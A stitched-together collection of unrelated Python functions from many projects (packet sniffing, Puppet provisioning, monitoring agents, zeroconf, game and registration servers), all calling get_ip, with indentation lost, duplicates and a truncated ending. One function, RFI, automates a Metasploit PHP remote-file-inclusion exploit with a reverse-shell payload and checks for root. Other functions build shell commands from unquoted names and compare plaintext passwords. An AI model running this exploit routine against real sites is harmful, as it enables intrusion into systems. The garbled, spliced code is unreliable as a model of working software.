def run(self, *args, **kwargs):
""" Deal with the incoming packets """
while True:
try:
timestamp, ip_p = self._queue.popleft()
src_ip = get_ip(ip_p, ip_p.src)
dst_ip = get_ip(ip_p, ip_p.dst)
src = intern('%s:%s' % (src_ip, ip_p.data.sport))
dst = intern('%s:%s' % (dst_ip, ip_p.data.dport))
key = intern('%s<->%s' % (src, dst))
stream = self._streams.get(key)
if stream is None:
stream = Stream(src, dst)
self._streams[key] = stream
# HACK: save the timestamp
setattr(ip_p, 'timestamp', timestamp)
pushed = stream.push(ip_p)
if not pushed:
continue
# let listeners know about the updated stream
for handler in self._handlers:
try:
handler(stream)
except Exception as ex:
print('handler exception: %s' % ex)
except Exception:
time.sleep(0.00001)
def run(self, *args, **kwargs):
""" Deal with the incoming packets """
while True:
try:
timestamp, ip_p = self._queue.popleft()
src_ip = get_ip(ip_p, ip_p.src)
dst_ip = get_ip(ip_p, ip_p.dst)
src = intern('%s:%s' % (src_ip, ip_p.data.sport))
dst = intern('%s:%s' % (dst_ip, ip_p.data.dport))
key = intern('%s<->%s' % (src, dst))
stream = self._streams.get(key)
if stream is None:
stream = Stream(src, dst)
self._streams[key] = stream
# HACK: save the timestamp
setattr(ip_p, 'timestamp', timestamp)
pushed = stream.push(ip_p)
if not pushed:
continue
# let listeners know about the updated stream
for handler in self._handlers:
try:
handler(stream)
except Exception as ex:
print('handler exception: %s' % ex)
except Exception:
time.sleep(0.00001)
def __init__(self, header):
self.hardware_type = header[:4]
self.protocol_type = header[4:8]
self.hardware_size = header[8:10]
self.protocol_size = header[10:12]
self.opcode = header[12:16]
self.sender_mac_address = get_mac(header[16:28])
self.sender_ip_address = get_ip(header[28:36])
self.target_mac_address = get_mac(header[36:48])
self.target_ip_address = get_ip(header[48:56])
def __init__(self, header):
self.version = header[0]
self.header_length = int(header[1], 16) * 4 # bytes
self.dsf = header[2:4]
self.total_length = int(header[4:8], 16) # bytes
self.indentification = header[8:12]
self.flags = byte2bin(header[12:14])[:3]
self.fragment_offset = byte2bin(header[12:16])[3:]
self.time_to_live = header[16:18] # ttl
self.next_proto = Ip.next_proto_map[header[18:20]]
self.checksum = header[20:24]
self.source = get_ip(header[24:32])
self.destination = get_ip(header[32:40])
def __init__(self, executor):
self.executor = executor
self.slaves = {}
self.master_host = util.start_lava(is_master=True)
ui.web.serve()
_, self.master_ip = util.get_ip()
def setup_agent5(hostname=None, domain=None, pc="1", agent_conf="files/puppet-agent5.conf", puppetserver=None,
proxy_url=None, hosts_file=None):
"""Setup Puppet 5 agent"""
import package, util, config
if not hostname:
hostname = util.get_hostname()
if not domain:
domain = util.get_domain()
install_puppetlabs_release_package(pc, proxy_url=proxy_url)
package.install("puppet-agent")
# Use puppetserver value from setting.ini file if none is given on the command-line. If that fails use the default.
if not puppetserver:
try: puppetserver = config.get("puppet", "puppetserver")
except: puppetserver = None
# Add a customized puppet.conf
util.put_and_chown(agent_conf, "/etc/puppetlabs/puppet/puppet.conf")
if puppetserver: server = puppetserver
else: server = "puppet.%s" % domain
sudo("puppet config set --section agent server %s" % server)
util.set_hostname(hostname + "." + domain)
util.add_host_entry(util.get_ip(), hostname, domain)
# Optionally add hosts from a separate file. This is useful when the IP of the puppetmaster as seen from the Puppet agent
# node does not match its name in DNS.
util.add_host_entries(hosts_file)
util.add_to_path("/opt/puppetlabs/bin")
run_agent(noop="False", onlychanges="False")
def setup_agent4(hostname=None, domain=None, pc="1", agent_conf="files/puppet-agent.conf", puppetserver=None, proxy_url=None, hosts_file=None):
"""Setup Puppet 4 agent"""
import package, util, config
if not hostname:
hostname = util.get_hostname()
if not domain:
domain = util.get_domain()
install_puppetlabs_release_package(pc, proxy_url=proxy_url)
package.install("puppet-agent")
# Use puppetserver value from setting.ini file if none is given on the
# command-line. If that fails use the default.
if not puppetserver:
try: puppetserver = config.get("puppet", "puppetserver")
except: puppetserver = None
# Add a customized puppet.conf
util.put_and_chown(agent_conf, "/etc/puppetlabs/puppet/puppet.conf")
if puppetserver: server = puppetserver
else: server = "puppet.%s" % domain
sudo("puppet config set --section agent server %s" % server)
util.set_hostname(hostname + "." + domain)
util.add_host_entry(util.get_ip(), hostname, domain)
# Optionally add hosts from a separate file. This is useful when the IP of
# the puppetmaster as seen from the Puppet agent node does not match its
# name in DNS.
util.add_host_entries(hosts_file)
util.add_to_path("/opt/puppetlabs/bin")
run_agent(noop="True", onlychanges="False")
def get(self, api_version, action):
"""Answer get requests"""
api_version = int(api_version)
if api_version != 0:
self.write({"status": "BAD_VERSION"})
return
if not check_origin(self):
self.write({"status": "BAD_ORIGIN"})
return
if database.is_host_banned(get_ip(self)):
self.write({"status": "IP_BANNED"})
return
actions = {
"session/add": self.session_add,
"session/remove": self.session_remove,
"session/active": self.session_active,
"list": self.list,
}
if action not in actions:
self.write({"status": "BAD_ACTION"})
return
actions[action]()
def __init__(self, executor):
self.executor = executor
self.slaves = {}
self.master_host = util.start_lava(is_master=True)
ui.web.serve()
_, self.master_ip = util.get_ip()
def __init__(self,
agent_config,
interval,
metrics_aggregator,
api_host,
api_key=None,
use_watchmonitor=False,
event_chunk_size=None):
threading.Thread.__init__(self)
self.ip = get_ip(agent_config)
self.interval = int(interval)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.flush_count = 0
self.log_count = 0
self.hostname = get_hostname()
self.watchmonitor = None
if use_watchmonitor:
from util import Watchmonitor
self.watchmonitor = Watchmonitor(WATCHmonitor_TIMEOUT)
self.api_key = api_key
self.api_host = api_host
self.event_chunk_size = event_chunk_size or EVENT_CHUNK_SIZE
def __init__(self,
port,
agentConfig,
watchmonitor=True,
skip_ssl_validation=False,
use_simple_http_client=False):
self.ip = get_ip(agentConfig, log)
self._port = int(port)
self._agentConfig = agentConfig
self._metrics = {}
AgentTransaction.set_application(self)
AgentTransaction.set_endpoints()
self._tr_manager = TransactionManager(MAX_WAIT_FOR_REPLAY,
MAX_QUEUE_SIZE, THROTTLING_DELAY)
AgentTransaction.set_tr_manager(self._tr_manager)
self._watchmonitor = None
self.skip_ssl_validation = skip_ssl_validation or agentConfig.get(
'skip_ssl_validation', False)
self.use_simple_http_client = use_simple_http_client
self._send_controler = 0 # control self.postAgentInfoToServer run once a minute
if self.skip_ssl_validation:
log.info(
"Skipping SSL hostname validation, useful when using a transparent proxy"
)
if watchmonitor:
watchmonitor_timeout = TRANSACTION_FLUSH_INTERVAL * WATCHmonitor_INTERVAL_MULTIPLIER / 1000
self._watchmonitor = Watchmonitor(watchmonitor_timeout,
max_mem_mb=agentConfig.get(
'limit_memory_consumption',
None))
def __init__(self, executor):
self.executor = executor
self.accepted_tasks = {}
self.running_tasks = {}
self.master_host = util.start_lava(is_master=True)
ui.web.serve()
self.master_ip = util.get_ip(self.master_host)
def __init__(self, executor):
self.executor = executor
self.accepted_tasks = {}
self.running_tasks = {}
self.master_host = util.start_lava(is_master=True)
ui.web.serve()
self.master_ip = util.get_ip(self.master_host)
def __init__(self, agent_config, script_paths, emitters, hostname):
self.ip = get_ip(agent_config, log)
self.agent_config = agent_config
self.script_paths = script_paths
self.emitters = emitters
self.hostname = hostname
self.os = get_os()
self.script_runners = []
def start_zeroconf(self):
try:
logging.info("Using bundled zeroconf v%s" % zeroconf_.__version__)
except:
logging.info("Using system zeroconf v%s" % zeroconf.__version__)
self.zeroconf = Zeroconf()
self.service_ident = auth.get_singleton().get_ident()
self.service_name = "%s.%s" % (self.service_ident, SERVICE_TYPE)
# If this process is killed (either kill ot logout), the service
# never gets unregistered, which will prevent remotes from seeing us
# when we come back. Our first service info is to get us back on
# momentarily, and the unregister properly, so remotes get notified.
# Then we'll do it again without the flush property for the real
# connection.
init_info = ServiceInfo(SERVICE_TYPE,
self.service_name,
port=prefs.get_port(),
addresses=[socket.inet_aton(util.get_ip())],
properties={
'hostname': util.get_hostname(),
'type': 'flush'
})
self.zeroconf.register_service(init_info)
time.sleep(3)
self.zeroconf.unregister_service(init_info)
time.sleep(3)
self.info = ServiceInfo(SERVICE_TYPE,
self.service_name,
port=prefs.get_port(),
addresses=[socket.inet_aton(util.get_ip())],
properties={
'hostname': util.get_hostname(),
'type': 'real'
})
self.zeroconf.register_service(self.info)
self.browser = ServiceBrowser(self.zeroconf, SERVICE_TYPE, self)
return False
def __init__(self):
print("TEST MODE: Entering test mode")
if (re.match('^172\.19\.9\.', util.get_ip())):
# Make life easy for Dave
print("TEST MODE: Welcome back, Dave")
else:
print()
print(
"****************************************************************"
)
print(
"**** DANGER: Test mode must NOT be run on the real roof!!! ****"
)
print(
"**** Physical damage will surely ensue ****"
)
print(
"**** It is intended for being run ONLY on the test rig ****"
)
print(
"****************************************************************"
)
print()
answer = input(
"Confirm you are connected to the test rig by typing TEST RIG now: "
)
if (answer == 'TEST RIG'):
print("It's a fair cop.")
else:
print("Abort.")
exit(1)
# Set up testing triggers
device.Sensor.by_name[
'mntin'].device.when_activated = lambda: self.blinkOnce(
device.Control.by_name['mntout'].device)
device.Sensor.by_name[
'roofin'].device.when_activated = lambda: self.blinkOnce(
device.Control.by_name['roofout'].device)
device.Sensor.by_name[
'park'].device.when_activated = lambda: self.blinkOnce(
device.Control.by_name['laser'].device)
device.Sensor.by_name[
'close'].device.when_activated = lambda: self.blinkOnce(
device.Control.by_name['fob'].device)
device.Sensor.by_name[
'wx'].device.when_activated = lambda: self.blinkTwice(
device.Control.by_name['laser'].device)
device.Sensor.by_name[
'bldg'].device.when_activated = lambda: self.blinkTwice(
device.Control.by_name['mntout'].device)
device.Sensor.by_name[
'open'].device.when_activated = lambda: self.blinkTwice(
device.Control.by_name['fob'].device)
def get_server_creds(self):
logging.debug("Auth: Creating server credentials")
key, cert = self.make_key_cert_pair(self.hostname, util.get_ip())
try:
self.save_private_key(key)
self.save_server_cert(cert)
except OSError as e:
logging.critical("Unable to save new server key and/or certificate: %s" % e)
return (key, cert)
def __init__(self):
self.service_name = "warp.__%s__.__%s__._http._tcp.local." % (
util.get_ip(), util.get_hostname())
super(LocalMachine, self).__init__()
GObject.Object.__init__(self)
self.ip_address = util.get_ip()
self.port = prefs.get_port()
self.remote_machines = {}
self.server_runlock = threading.Condition()
self.browser = None
self.zeroconf = None
self.zeroconf = None
self.info = None
self.display_name = GLib.get_real_name()
self.start_server()
def _handle_packet(self, packet):
try:
ip_p = get_ip_packet(packet.load, 0, self._port)
except ValueError:
return
ip_data = getattr(ip_p, 'data', None)
if ip_data is None:
return
if ip_data.sport != self._port and ip_data.dport != self._port:
return
if self._ip:
src_ip = get_ip(ip_p, ip_p.src)
dst_ip = get_ip(ip_p, ip_p.dst)
if src_ip not in self._ip and dst_ip not in self._ip:
return
self._queue.append((packet.time, ip_p))
def _handle_packet(self, packet):
try:
ip_p = get_ip_packet(packet.load, 0, self._port)
except ValueError:
return
ip_data = getattr(ip_p, 'data', None)
if ip_data is None:
return
if ip_data.sport != self._port and ip_data.dport != self._port:
return
if self._ip:
src_ip = get_ip(ip_p, ip_p.src)
dst_ip = get_ip(ip_p, ip_p.dst)
if src_ip not in self._ip and dst_ip not in self._ip:
return
self._queue.append((packet.time, ip_p))
def start_zeroconf(self):
self.zeroconf = Zeroconf()
self.service_ident = auth.get_singleton().get_ident()
self.service_name = "%s.%s" % (self.service_ident, SERVICE_TYPE)
self.info = ServiceInfo(SERVICE_TYPE,
self.service_name,
socket.inet_aton(util.get_ip()),
prefs.get_port(),
properties={'hostname': util.get_hostname()})
self.zeroconf.register_service(self.info)
return False
def __init__(self, numberOfMeetingRoom):
self.meetingRoomNum = numberOfMeetingRoom
self.lock = threading.Lock()
self.ip = util.get_ip()
self.conn = sqlite3.connect("Server.db", check_same_thread=False)
logging.basicConfig(filename="server_log.txt",
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.DEBUG)
#util.reset(self.conn)
util.createServerBookingTable(self.conn)
util.createServerRecevedRequestTable(self.conn)
util.createServerInviteTable(self.conn)
util.createServerInviteListTable(self.conn)
util.createServerMeetingNumCacheTable(self.conn)
util.createServerMeetingNumberToRoom(self.conn)
try:
currentMeetingNum = self.conn.cursor().execute(
'''
SELECT * from meetingNum
'''
).fetchall()
model.Invite.meetingNumber = len(currentMeetingNum) + 1
except Exception as e:
print(e)
pass
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
HOST = self.ip
self.s.bind((HOST, PORT))
self.s.setblocking(0)
print("Socket created")
except Exception as e:
print(e)
sys.exit()
self.running = True
#self._menu(0,0)
self.startListner()
self.startMenu()
#self.messageAckWatchdog()
print("Server is running")
def finish_registration(self, result, request, service_name):
"""
Actually store the IP and service name of the current node, or return
something that indicates that something went wrong.
"""
node_ip = util.get_ip()
service_ips = []
if type(result) is dict:
service_ips.extend(util.split_ips(result[service_name]))
service_ips.append(node_ip)
deferred_result = self.node.store_value(service_name,
util.ips_to_string(service_ips))
deferred_result.addCallback(self.async_success, request)
logger.info("Registering {} as {}".format(node_ip, service_name))
return NOT_DONE_YET
def finish_unregistration(self, result, request, service_name):
node_ip = util.get_ip()
service_ips = []
if type(result) is dict:
service_ips.extend(util.split_ips(result[service_name]))
try:
service_ips.remove(node_ip)
deferred_result = self.node.store_value(service_name,
util.ips_to_string(service_ips))
deferred_result.addCallback(self.async_success, request)
logger.info("Unregistering {} as a {}".format(node_ip, service_name))
return NOT_DONE_YET
except ValueError:
logger.info("{} is not registered".format(node_ip, service_name))
request.setResponseCode(200)
request.finish()
def run_task():
"""
Run a Apache Mesos Task.
"""
# start openlava services
tmp = json.loads(task.data)
host = tmp['master_host']
ip_addr = tmp['master_ip']
util.add_to_hosts(host, ip_addr)
util.add_to_cluster_conf(host)
slave_host, slave_ip = util.get_ip()
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_RUNNING
update.data = slave_host + ':' + slave_ip
driver.sendStatusUpdate(update)
util.start_lava()
# in case I'm idle for a while done.
busy = True
count = 0
while busy:
time.sleep(10)
try:
if util.njobs_per_host(slave_host.strip()) == 0:
count += 1
except:
# lim not ready...
pass
if count >= 12:
busy = False
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_FINISHED
update.data = slave_host + ':' + slave_ip
driver.sendStatusUpdate(update)
util.stop_lava()
def serve_cert_thread(self):
try:
server_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_sock.settimeout(1.0)
server_sock.bind((util.get_ip(), prefs.get_port()))
except socket.error as e:
logging.critical("Could not create udp socket for cert requests: %s" % str(e))
return
while True:
try:
data, address = server_sock.recvfrom(2000)
if data == REQUEST:
cert_data = get_singleton().get_encoded_server_cert()
server_sock.sendto(cert_data, address)
except socket.timeout as e:
if self.exit:
server_sock.close()
break
def __init__(self):
super(Server, self).__init__()
GObject.Object.__init__(self)
self.service_name = None
self.service_ident = None
self.ip_address = util.get_ip()
self.port = prefs.get_port()
self.remote_machines = {}
self.server_runlock = threading.Condition()
self.server = None
self.browser = None
self.zeroconf = None
self.zeroconf = None
self.info = None
self.display_name = GLib.get_real_name()
self.start_server()
def __init__(self, command, times, name, notify, pool=Pool()):
self.pool = pool
self.lock = threading.Lock()
self.results = []
self.command = command
self.times = times
# Notifications
self.notify = notify
# Job control
self.dispaching = True
self.runs = 0
self.completed = 0
self.lock = threading.Lock()
self.callback = lambda *args: None
self.id = name
# Prepare file system
os.system("mkdir -p results/{}".format(self.id))
os.system("mkdir -p results/{}/runs".format(self.id))
# Logging
self.log = "results/{}/log.txt".format(self.id)
os.system("rm -f {}".format(self.log))
# Run server
self.ip = get_ip()
self.port = int(random.uniform(30000, 30100))
self.server = Server("coordinator", self.port)
self.server.add_component_post("/done", OnDone(self))
self.server.add_component_post("/start", OnStart(self))
threading.Thread(target=self.server.run).start()
def __init__(self):
threading.Thread.__init__(self, name="server-thread")
super(Server, self).__init__()
GObject.Object.__init__(self)
self.service_name = None
self.service_ident = None
self.ip_address = util.get_ip()
self.port = prefs.get_port()
self.remote_machines = {}
self.server_thread_keepalive = threading.Event()
self.server = None
self.browser = None
self.zeroconf = None
self.zeroconf = None
self.info = None
self.display_name = GLib.get_real_name()
self.start()
def get(self, request, ip, *args, **kw):
"""
:param ip: str of the ip address the user wants a threat report for
:return: IPDetails
"""
ip_details = IPDetails(ip, *args, **kw)
serialize = DetailsSerializer(ip_details)
response = Response(serialize.data, status=status.HTTP_200_OK)
cookie = request.COOKIES.get(settings.COOKIE_NAME, None)
if cookie is None:
alien_vault = AlienVault()
else:
try:
alien_vault = AlienVault.objects.filter(alien_vault_id=cookie).get()
except:
alien_vault = AlienVault()
alien_vault.total_count += 1
alien_vault.valid_count += ip_details.is_valid and 1 or 0
alien_vault.error_count += ip_details.http_code > 299 and 1 or 0
alien_vault.save()
TrackVisits(alien_vault=alien_vault,
address = get_ip(request),
endpoint='api/threat/ip/%s'%ip).save()
expires = datetime.datetime.utcnow() + datetime.timedelta(seconds=settings.COOKIE_LIFETIME)
response.set_cookie(settings.COOKIE_NAME,
alien_vault.alien_vault_id,
max_age=settings.COOKIE_LIFETIME,
expires=expires.strftime('%a, %d-%b-%Y %H:%M:%S GMT'),
domain=settings.COOKIE_DOMAIN,
secure = settings.COOKIE_SECURE or None)
return response
def start_zeroconf(self):
self.zeroconf = Zeroconf()
self.info = ServiceInfo("_http._tcp.local.", self.service_name,
socket.inet_aton(util.get_ip()),
prefs.get_port(), 0, 0, {}, "somehost.local.")
self.zeroconf.register_service(self.info)
#!/usr/bin/env python import os import re import subprocess import sys import util import xmlrpclib from scp import SCPException server = 'https://www.planet-lab.org/PLCAPI/' host = util.get_ip(None) username = '******' password = '******' slice_name = 'ubc_cpen431_8' port = '12664' load_threshold = 100 ping_threshold = 50 directory = 'monitor' output = 'monitor.log' nodes_list = 'nodes.list' test = 'test.txt' java = 'jre.rpm' command_ping_linux = "ping -c 5 -i 0.2 -p 12664 %s | grep rtt" command_ping_windows = "ping %s | grep 'Average'" command_uptime = "uptime" command_remove = "rm %s" command_java = "java -version"
def session_add(self):
"""Adds a new session"""
if not check_origin(self):
self.write({"status": "BAD_ORIGIN"})
return
if list(HOSTS.values()).count(
get_ip(self)) > settings.MAXIMUM_SESSIONS_PER_HOST:
self.write({"status": "TOO_MANY_SESSIONS"})
return
session = {}
for key in [
"name",
"region",
"game",
"server_id",
"port",
"player_count",
"in_game",
"password",
"version",
"method",
]:
session[key] = self.get_argument(key, default=None, strip=True)
if session[key] is None:
self.write({"status": "MISSING_PARAMETER", "parameter": key})
return
if database.is_string_blacklisted(session[key]):
self.write({"status": "BLACKLISTED_WORD", "parameter": key})
return
if session["region"] not in settings.VALID_REGIONS:
self.write({"status": "BAD_REGION"})
return
if not 0 < len(session["name"]) < settings.SESSION_MAX_STRING_LENGTH:
self.write({"status": "BAD_NAME_LENGTH"})
return
if not 0 < len(session["game"]) < settings.SESSION_MAX_STRING_LENGTH:
self.write({"status": "BAD_GAME_LENGTH"})
return
if not 0 < len(
session["server_id"]) < settings.SESSION_MAX_STRING_LENGTH:
self.write({"status": "BAD_SERVER_ID_LENGTH"})
return
if not 0 < int(session["port"]) <= 65535:
self.write({"status": "BAD_PORT"})
return
if session["method"] not in ["direct", "traversal"]:
self.write({"status": "BAD_METHOD"})
return
session["timestamp"] = time.time()
try:
session["in_game"] = bool(int(session["in_game"]))
session["password"] = bool(int(session["password"]))
session["port"] = int(session["port"])
session["player_count"] = int(session["player_count"])
except ValueError:
self.write({"status": "PARSING_ERROR"})
return
secret = generate_secret()
SESSIONS[secret] = session
HOSTS[secret] = get_ip(self)
REGIONS[secret] = get_ip_region(HOSTS[secret])
self.write({"status": "OK", "secret": secret})
def RFI(issue):
url = issue["vector"]["action"]
cookie_string = issue["cookie_string"]
method = issue["vector"]["method"]
shell = "false"
shell_user = "******"
args = issue["vector"]["default_inputs"]
affected_arg = issue['vector']["affected_input_name"]
ip = util.get_ip(url)
args_string = ""
for k, v in args.items():
if k == affected_arg:
args_string += f"{k}=XXpathXX&"
else:
args_string += f"{k}={v}&"
args_string = args_string[:-1]
next_state = "initialization"
random.seed(time.time())
rfi_seed = str(random.randint(0, 10000))
path = util.get_path(url)
with open(f'./msfScript/{rfi_seed}.rc', 'w+') as f:
f.write("use exploit/unix/webapp/php_include\n")
f.write(f"set rhost {ip}\n")
if cookie_string:
f.write(f'set headers "Cookie:{cookie_string}"\n')
f.write(f"set phpuri {path}?{args_string}\n")
f.write(f"set payloads generic/shell_reverse_tcp\n")
f.write(f"run")
rfi_cmd = pexpect.spawn(f"msfconsole -q -r ./msfScript/{rfi_seed}.rc",
encoding='utf-8')
rfi_cmd.logfile = sys.stdout
index = rfi_cmd.expect(["session 1 opened", pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
rfi_cmd.sendline("whoami")
rfi_cmd.readline()
rfi_cmd.readline()
rfi_cmd.readline()
shell = "true"
shell_user = rfi_cmd.readline()
shell_user = util.ansi_escape(shell_user).replace("\r\n", "")
print(
f"\n[*] ======== Shell is successfully generated, the current user is {shell_user}"
)
if shell_user == "root":
next_state = "root"
else:
next_state = "basic"
else:
print(f"\n[*] ======== Failed to generate shell")
rfi_cmd.close()
report_issue = {}
# save in report
report_issue["name"] = issue["name"]
report_issue["cwe"] = issue["cwe"]
report_issue["url"] = url
cookie = {}
if cookie_string:
for line in cookie_string.split(';'):
name, value = line.strip().split("=", 1)
cookie[name] = value
report_issue["cookie"] = cookie
report_issue["shell"] = shell
report_issue["shell_user"] = shell_user
report_issue["msf_script"] = f"{rfi_seed}.rc"
report_issue["vector"] = {}
report_issue["vector"]["affected_arg"] = affected_arg
report_issue["vector"]["args"] = args
report_issue["state"] = "exploit"
report_issue["next_state"] = next_state
return report_issue
def req(cur: Cursor = None) -> dict:
"""
玩家申请注册
"""
json_data = request.get_json()
# 玩家名查重
cur.execute(
"""
SELECT
password, qq, status
FROM apply_player
WHERE player_name = %s
""", (json_data["playerName"], ))
player = cur.fetchone()
if player:
if player[0] == json_data["password"] and player[1] == json_data["qq"]:
if player[2] == ApplyStatus.NEW.name:
return success("您之前的申请仍在等待审核")
elif player[2] == ApplyStatus.ACCEPT.name:
return success("您之前的申请已通过")
elif player[2] == ApplyStatus.DENY.name:
return success("您之前的申请已被拒绝")
else:
raise Exception("?????")
else:
return fail("玩家名已存在")
# QQ 查重
cur.execute(
"""
SELECT
player_name
FROM apply_player
WHERE qq = %s
""", (json_data["qq"], ))
if cur.fetchone():
return fail("QQ 号已存在")
# 校验参数
req_type: str = json_data['type']
op_name = None
if req_type == ApplyType.QQLevel.name:
pass
elif req_type == ApplyType.Invite.name:
if not valid_not_blank(json_data, "oldPlayerName"):
return fail("未填写邀请人玩家名")
elif req_type == ApplyType.PYJY.name:
if not valid_not_blank(json_data, "opName"):
return fail("未填写 OP 名")
else:
op_name = json_data["opName"]
if op_name.endswith("_OP"):
op_name = op_name[:-3]
ip = get_ip("X-Forwarded-For")
if ip != '127.0.0.1':
cur.execute(
"""
SELECT
COUNT(*)
FROM apply_player
WHERE ip = %s
AND status = 'NEW'
""", (ip, ))
ip_count = cur.fetchone()
if ip_count[0] > 3:
return fail("同一个 IP 最多只能有三个申请")
pass
cur.execute(
"""
SELECT
req_time
FROM apply_player
WHERE ip = %s
AND status = 'NEW'
ORDER BY req_time DESC
LIMIT 1
""", (ip, ))
last_time = cur.fetchone()
if last_time and (datetime.now() - datetime.strptime(
last_time[0], "%Y-%m-%d %H:%M:%S.%f")).seconds < 3600:
return fail("同一个 IP 每小时只能申请一次")
pass
# 插 DB
cur.execute(
"""
INSERT INTO apply_player VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)
""", (json_data["playerName"], json_data["password"], datetime.now(), None,
None, ApplyStatus.NEW.name, ApplyType.__members__[req_type].name, ip,
json_data["qq"], json_data["oldPlayerName"], op_name))
return success()
def setup_server4(hostname=None, domain=None, pc="1", forge_modules=["puppetlabs/stdlib", "puppetlabs/concat", "puppetlabs/firewall", "puppetlabs/apt"]):
"""Setup Puppet 4 server"""
import package, util, git, service
# Local files to copy over
basedir = "/etc/puppetlabs"
local_master_conf = "files/puppet-master.conf"
remote_master_conf = basedir+"/puppet/puppet.conf"
local_autosign_conf = "files/autosign.conf"
remote_autosign_conf = basedir+"/puppet/autosign.conf"
local_hiera_yaml = "files/hiera.yaml"
remote_hiera_yaml = basedir+"/code/hiera.yaml"
local_fileserver_conf = "files/fileserver.conf"
remote_fileserver_conf = basedir+"/puppet/fileserver.conf"
local_environments = "files/environments"
remote_codedir = basedir+"/code"
local_gitignore = "files/gitignore"
remote_gitignore = basedir+"/.gitignore"
local_files_dir = "files/files"
modules_dir = basedir+"/code/environments/production/modules"
hiera_nodes_dir = basedir+"/code/environments/production/hieradata/nodes"
# Verify that all the local files are in place
try:
open(local_master_conf)
open(local_hiera_yaml)
except IOError:
print "ERROR: some local config files were missing!"
sys.exit(1)
# Autodetect hostname and domain from env.host, if they're not overridden
# with method parameters
if not hostname:
hostname = util.get_hostname()
if not domain:
domain = util.get_domain()
fqdn = "%s.%s" % (hostname, domain)
# Ensure that clock is correct before doing anything else, like creating SSL
# certificates.
util.set_clock()
# Start the install
install_puppetlabs_release_package(pc)
package.install("puppetserver")
util.put_and_chown(local_master_conf, remote_master_conf)
util.put_and_chown(local_autosign_conf, remote_autosign_conf)
util.put_and_chown(local_hiera_yaml, remote_hiera_yaml)
util.put_and_chown(local_fileserver_conf, remote_fileserver_conf)
util.put_and_chown(local_gitignore, remote_gitignore)
util.add_to_path("/opt/puppetlabs/bin")
util.set_hostname(hostname + "." + domain)
# "facter fqdn" return a silly name on EC2 without this
util.add_host_entry(util.get_ip(), hostname, domain)
# Copy over template environments
util.put_and_chown(local_environments, remote_codedir)
# Copy over the Puppet fileserver directory
util.put_and_chown(local_files_dir, remote_codedir)
# Generate master node yaml file (fqdn.yaml) and copy it over to remote server
master_yaml = StringIO()
make_puppetmaster_yaml(fqdn, util.password(), stream=master_yaml)
util.put_and_chown(master_yaml, "%s/%s.yaml" % (hiera_nodes_dir, fqdn))
# Add modules from Puppet Forge. These should in my experience be limited to
# those which provide new types and providers. In particular puppetlabs'
# modules which control some daemon (puppetdb, postgresql, mysql) are
# extremely complex, very prone to breakage and nasty to debug.
for module in forge_modules:
add_forge_module(module)
# Git setup
git.install()
git.init(basedir)
if not exists(modules_dir):
sudo("mkdir "+modules_dir)
git.init(modules_dir)
git.add_submodules(basedir=modules_dir)
git.add_all(basedir)
git.commit(basedir, "Initial commit")
# Link hieradata and manifests from production to testing. This keeps the
# testing environment identical to the production environment. The modules
# directory in testing is separate and may (or may not) contain modules that
# override or complement those in production.
util.symlink(remote_codedir+"/environments/production/hieradata", remote_codedir+"/environments/testing/hieradata")
util.symlink(remote_codedir+"/environments/production/manifests", remote_codedir+"/environments/testing/manifests")
# Start puppetserver to generate the CA and server certificates/keys
service.start("puppetserver")
# Set master FQDN and run agent
sudo("puppet config set --section agent server %s" % fqdn)
util.add_to_path("/opt/puppetlabs/bin")
run_agent(noop="False")
# The Puppet run modified puppet and puppetdb configs, so we need to
# version the changes.
git.add_all(basedir)
git.commit(basedir, "Commit after the first Puppet run")
def __init__(self, agentConfig, emitters, systemStats, hostname):
self.ip = get_ip(agentConfig)
self.emit_duration = None
self.agentConfig = agentConfig
self.hostname = hostname
self.agentConfig['system_stats'] = systemStats
self.os = get_os()
self.plugins = None
self.emitters = emitters
self.check_timings = agentConfig.get('check_timings')
self.push_times = {
'host_metadata': {
'start': time.time(),
'interval': int(agentConfig.get('metadata_interval', 4 * 60 * 60))
},
'external_host_tags': {
'start': time.time() - 3 * 60,
'interval': int(agentConfig.get('external_host_tags', 5 * 60))
},
'agent_checks': {
'start': time.time(),
'interval': int(agentConfig.get('agent_checks_interval', 10 * 60))
},
}
socket.setdefaulttimeout(15)
self.run_count = 0
self.continue_running = True
self.hostname_metadata_cache = None
self.initialized_checks_d = []
self.init_failed_checks_d = {}
self._unix_system_checks = {
'io': u.IO(log),
'load': u.Load(log),
'memory': u.Memory(log),
'processes': u.Processes(log),
'cpu': u.Cpu(log),
'system': u.System(log)
}
self._win32_system_checks = {
'io': w32.IO(log),
'proc': w32.Processes(log),
'memory': w32.Memory(log),
'network': w32.Network(log),
'cpu': w32.Cpu(log),
'system': w32.System(log)
}
self._ganglia = Ganglia(log)
self._monitorstream = monitorstreams.init(log, self.agentConfig)
self._ddforwarder = DdForwarder(log, self.agentConfig)
self._agent_metrics = None
self._metrics_checks = []
for module_spec in [s.strip() for s in self.agentConfig.get('custom_checks', '').split(',')]:
if len(module_spec) == 0:
continue
try:
self._metrics_checks.append(modules.load(module_spec, 'Check')(log))
log.info("Registered custom check %s" % module_spec)
log.warning(
"Old format custom checks are deprecated. They should be moved to the checks.d interface as old custom checks will be removed in a next version")
except Exception:
log.exception('Unable to load custom check module %s' % module_spec)
def req() -> dict:
"""
玩家申请注册
"""
json_data = request.get_json()
# 玩家名查重
player: ApplyPlayer = ApplyPlayer.query \
.filter_by(player_name=json_data["player_name"]) \
.filter(ApplyPlayer.status.in_([ApplyStatus.NEW, ApplyStatus.ACCEPT])) \
.first()
if player:
return fail("玩家名已存在")
account: CrazyLoginAccount = CrazyLoginAccount.query \
.filter(func.lower(CrazyLoginAccount.name) == json_data["player_name"].lower()) \
.first()
if account:
return fail("玩家名已存在")
# QQ 查重
player: ApplyPlayer = ApplyPlayer.query \
.filter_by(qq=json_data["qq"]) \
.filter(ApplyPlayer.status.in_([ApplyStatus.NEW, ApplyStatus.ACCEPT])) \
.first()
if player:
return fail("QQ 号已存在或正在审核")
last_time = db.session.query(ApplyPlayer.req_time) \
